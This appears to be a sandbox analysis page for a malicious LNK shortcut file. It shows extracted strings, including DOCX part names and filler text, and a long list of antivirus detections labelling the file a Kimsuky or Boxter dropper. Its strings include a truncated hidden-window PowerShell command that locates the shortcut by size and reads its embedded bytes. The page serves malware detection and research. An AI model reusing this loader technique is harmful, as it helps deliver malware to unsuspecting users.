Static | ZeroBOX
No static analysis available.
%windir%\system32\cmd.exe
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
_rels/.rels
bmO6P
word/_rels/document.xml.rels
word/document.xml
^)(|--
N\F<cbg
h4E2'r
D{$my7
ijONDH
&9L(2Dk
Mq~"$@
qO;JMb
word/numbering.xml
word/styles.xml
[Content_Types].xml
_rels/.relsPK
word/_rels/document.xml.relsPK
word/document.xmlPK
word/numbering.xmlPK
word/styles.xmlPK
[Content_Types].xmlPK
vmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhcccccccccsddddvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhcccccccccsddddvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhcccccccccsddddvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhcccccccccsddddvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhcccccccccsddddvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhcccccccccsddddvmsd
AType: Text Document
Size: 5.23 KB
Date modified: 01/02/2020 11:23
/c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = '%temp%';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x00103CFB) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $
.\123.docx
%windir%\system32\cmd.exe
Antivirus Signature
Bkav Clean
Lionic Trojan.WinLNK.Boxter.4!c
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Dropper.tx
ALYac Trojan.Agent.LNK.Gen
Malwarebytes Clean
Zillya Trojan.Kimsuky.Script.11
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec Scr.Mallnk!gen13
ESET-NOD32 LNK/Kimsuky.I
TrendMicro-HouseCall Clean
Avast LNK:Agent-EW [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.Multi.Agent.gen
BitDefender Heur.BZC.YAX.Boxter.781.B4AAC4E8
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Heur.BZC.YAX.Boxter.781.B4AAC4E8
Tencent Clean
Sophos Troj/LnkObf-T
F-Secure Clean
DrWeb Clean
VIPRE Heur.BZC.YAX.Boxter.781.B4AAC4E8
TrendMicro Clean
FireEye Heur.BZC.YAX.Boxter.781.B4AAC4E8
Emsisoft Trojan.PowerShell.Gen (A)
GData Heur.BZC.YAX.Boxter.781.B4AAC4E8
Jiangmin Clean
Varist Clean
Avira Clean
MAX malware (ai score=100)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.YAX.Boxter.781.B4AAC4E8
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Multi.Agent.gen
Microsoft Clean
Google Detected
AhnLab-V3 Downloader/LNK.Agent.SC199941
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Trojan.Link.Crafted
Zoner Clean
Rising Trojan.PSRunner/LNK!1.DB7E (CLASSIC)
Yandex Clean
Ikarus Trojan.LNK.Kimsuky
MaxSecure Clean
Fortinet LNK/Kimsuky.GOSU!tr
BitDefenderTheta Clean
AVG LNK:Agent-EW [Trj]
Panda Clean
CrowdStrike Clean
alibabacloud Trojan:Win/Kimsuky.I
No IRMA results available.